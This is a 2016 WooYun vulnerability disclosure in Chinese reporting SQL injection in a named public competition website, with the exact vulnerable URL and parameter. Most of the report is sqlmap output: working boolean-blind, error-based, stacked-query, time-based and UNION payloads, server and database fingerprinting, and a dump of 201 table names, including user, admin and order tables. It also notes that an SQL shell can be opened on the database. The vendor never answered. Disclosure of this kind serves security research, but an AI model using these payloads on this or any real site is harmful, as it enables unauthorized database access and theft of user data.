全民竞赛网sql注入 | wooyun-2016-0194810| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0194810

漏洞标题：全民竞赛网sql注入

漏洞作者：路人甲

提交时间：2016-04-11 10:29

修复时间：2016-05-26 10:30

公开时间：2016-05-26 10:30

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：10

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-04-11：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-26：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

全民竞赛网是为政府、企事业单位、学校向公众提供宣传和普及知识的网上竞赛平台。

详细说明：

1.全民竞赛网存在sql注入，注入点：http://www.chinese-js.com/NewsDetail.aspx?id=105192
2.sqlmap验证：

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=105192 AND 3822=3822
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: id=105192 AND 2609=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (2609=2609) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113)))
    Type: inline query
    Title: Microsoft SQL Server/Sybase inline queries
    Payload: id=(SELECT CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (3735=3735) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113))
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: id=105192;WAITFOR DELAY '0:0:5'--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=105192 WAITFOR DELAY '0:0:5'
    Type: UNION query
    Title: Generic UNION query (NULL) - 18 columns
    Payload: id=105192 UNION ALL SELECT NULL,NULL,NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(118)+CHAR(113)+CHAR(109)+CHAR(106)+CHAR(72)+CHAR(121)+CHAR(121)+CHAR(104)+CHAR(89)+CHAR(68)+CHAR(97)+CHAR(108)+CHAR(77)+CHAR(111)+CHAR(71)+CHAR(109)+CHAR(121)+CHAR(70)+CHAR(80)+CHAR(77)+CHAR(115)+CHAR(102)+CHAR(100)+CHAR(116)+CHAR(75)+CHAR(119)+CHAR(72)+CHAR(67)+CHAR(109)+CHAR(122)+CHAR(99)+CHAR(116)+CHAR(117)+CHAR(102)+CHAR(117)+CHAR(102)+CHAR(106)+CHAR(84)+CHAR(122)+CHAR(104)+CHAR(108)+CHAR(109)+CHAR(113)+CHAR(120)+CHAR(112)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -
---
[21:53:50] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

3.跑出8个数据库

4.当前数据库为：123js，跑出201个表

Database: 123js                                                                
[201 tables]
+-------------------------------------+
| City                                |
| CloudService                        |
| Competition_temp                    |
| LinkCN1                             |
| LinkCN1                             |
| Picture                             |
| Province                            |
| View_BranchScore                    |
| View_Competition_Users              |
| View_Question                       |
| View_tblAdUser                      |
| View_tblAddMoneyRecord              |
| View_tblArticle                     |
| View_tblCompPrice                   |
| View_tblCompPrjEvaluation           |
| View_tblCompPrjUserComment          |
| View_tblCompProject                 |
| View_tblCompType2                   |
| View_tblCompType3                   |
| View_tblCreateCompRecord            |
| View_tblDS_Branch                   |
| View_tblDS_Competition              |
| View_tblDS_TestStock                |
| View_tblDS_UserExamResult           |
| View_tblDS_Users                    |
| View_tblDataDownload                |
| View_tblMember                      |
| View_tblOrder                       |
| View_tblResearchRecord              |
| View_tblSetMealOrder                |
| View_tblShareExperience             |
| View_tblSuccessfulCase_New          |
| View_tblSuccessfulCase_New          |
| View_tblSysUser                     |
| View_tblWeinxin_Huodong             |
| View_tblWeinxin_PrizeUser           |
| View_tblWeixin_DatiDetail           |
| View_tblWeixin_Users                |
| View_tblWenda                       |
| ceshi                               |
| comd_list                           |
| t_jiaozhu                           |
| tata                                |
| tblAboutUs                          |
| tblAdUser                           |
| tblAddMoneyRecord                   |
| tblArea                             |
| tblArticle1                         |
| tblArticle1                         |
| tblArticleHistory                   |
| tblArticleRemark                    |
| tblArticleRemarkReport              |
| tblArticleType                      |
| tblAskForAgent                      |
| tblBlackList_IP                     |
| tblBlackList_OpenId                 |
| tblBranchCode                       |
| tblCarbonFootprint                  |
| tblCardNo                           |
| tblCityIP                           |
| tblCommendAreaInfo                  |
| tblCommendAreaInfo                  |
| tblCommendNews                      |
| tblCompMode                         |
| tblCompPrice                        |
| tblCompPrjEvaluation                |
| tblCompPrjUserComment               |
| tblCompProject                      |
| tblCompSetMeal                      |
| tblCompType1                        |
| tblCompType1                        |
| tblCompType2                        |
| tblCompType3                        |
| tblCompUserGroup                    |
| tblCounty                           |
| tblCreateCompRecord                 |
| tblDP_CommentProd                   |
| tblDP_Company                       |
| tblDP_ProdType1                     |
| tblDP_ProdType2                     |
| tblDP_ProductInfo                   |
| tblDS_Advice                        |
| tblDS_Age                           |
| tblDS_Area                          |
| tblDS_Baoming                       |
| tblDS_Branch                        |
| tblDS_CommendBBS                    |
| tblDS_CommendInfo                   |
| tblDS_CompSolution                  |
| tblDS_CompetitionAd_Temp            |
| tblDS_CompetitionAd_Temp            |
| tblDS_CompetitionAd_Temp            |
| tblDS_CompetitionPoint              |
| tblDS_CompetitionQuestion           |
| tblDS_CompetitionType               |
| tblDS_Identity                      |
| tblDS_Industry                      |
| tblDS_JiYu                          |
| tblDS_Log                           |
| tblDS_Neighborhood                  |
| tblDS_Pic                           |
| tblDS_PrizeBill_Branch              |
| tblDS_PrizeBill_Person              |
| tblDS_Street                        |
| tblDS_TestStockDesc                 |
| tblDS_TestStockModel                |
| tblDS_TestStock_temp                |
| tblDS_TestStock_temp                |
| tblDS_UserExamResult_Temp           |
| tblDS_UserExamResult_Temp           |
| tblDS_Users_Temp                    |
| tblDS_Users_sj_full1                |
| tblDS_Users_sj_full1                |
| tblDS_Work                          |
| tblDataDownload                     |
| tblDataDownloadType                 |
| tblDirect                           |
| tblFPN_Mutuality                    |
| tblFriendLink                       |
| tblFrontPageNews                    |
| tblFrontPageNewsType                |
| tblGetNewsLOG                       |
| tblGrade                            |
| tblHomeCommend1                     |
| tblHomeCommend1                     |
| tblHotNews                          |
| tblKeyWords                         |
| tblLeaveWord                        |
| tblLoginLog                         |
| tblMember_temp                      |
| tblMember_temp                      |
| tblMobile_TestStockScore1           |
| tblMode                             |
| tblNewsSource1                      |
| tblNewsSource1                      |
| tblObjective                        |
| tblOrder                            |
| tblPhotoVoteActiveLeaveWord         |
| tblPhotoVoteActiveLeaveWord         |
| tblPhotoVoteDetail                  |
| tblPhotoVoteInfo                    |
| tblPhotoVote_PrizeItem              |
| tblPhotoVote_PrizeUser              |
| tblPicNews                          |
| tblPicNewsType                      |
| tblProductInfo                      |
| tblResearchDetail                   |
| tblResearchDetail                   |
| tblResearchRecord                   |
| tblRight                            |
| tblRole                             |
| tblRoleRight                        |
| tblSetMealOrder                     |
| tblShareExperience                  |
| tblSite                             |
| tblSpecial_Xihui                    |
| tblSpiderSource                     |
| tblSuccessfulCaseType               |
| tblSuccessfulCase_New               |
| tblSuccessfulCase_New               |
| tblSunVoteComp                      |
| tblSunVoteComp                      |
| tblSunVoteTestStock                 |
| tblSunVoteUserExamResult            |
| tblSunVoteUsers                     |
| tblSysUser                          |
| tblTempComp                         |
| tblTestRandom                       |
| tblTestRandomType_8                 |
| tblTestRandomType_8                 |
| tblUnionids                         |
| tblUserWorks                        |
| tblUsers                            |
| tblVisitRecord_cut                  |
| tblVisitRecord_cut                  |
| tblVoteActive                       |
| tblVoteDetail                       |
| tblVoteInfo                         |
| tblVoteItem不用                         |
| tblVote不用                             |
| tblWeinxin_HuodongMode              |
| tblWeinxin_HuodongMode              |
| tblWeinxin_HuodongPlan              |
| tblWeinxin_PrizeItem                |
| tblWeinxin_PrizeUser                |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketTotalDetailPlan |
| tblWeinxin_RedPacketUser            |
| tblWeixin_DatiDetail                |
| tblWeixin_DatiDetail                |
| tblWeixin_Shiti                     |
| tblWeixin_Users                     |
| tblWenda                            |
| tblWendaType                        |
| tblWhiteList_IP                     |
| tblWhiteList_OpenId                 |
| tblWorksMessageBoard                |
| tblWorksNotice                      |
| tet                                 |
| xx                                  |
| 查询                                  |
+-------------------------------------+

4.可用--sql-shell 写入sql shell进行数据库操作

漏洞证明：

如上。

修复方案：

防注入

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)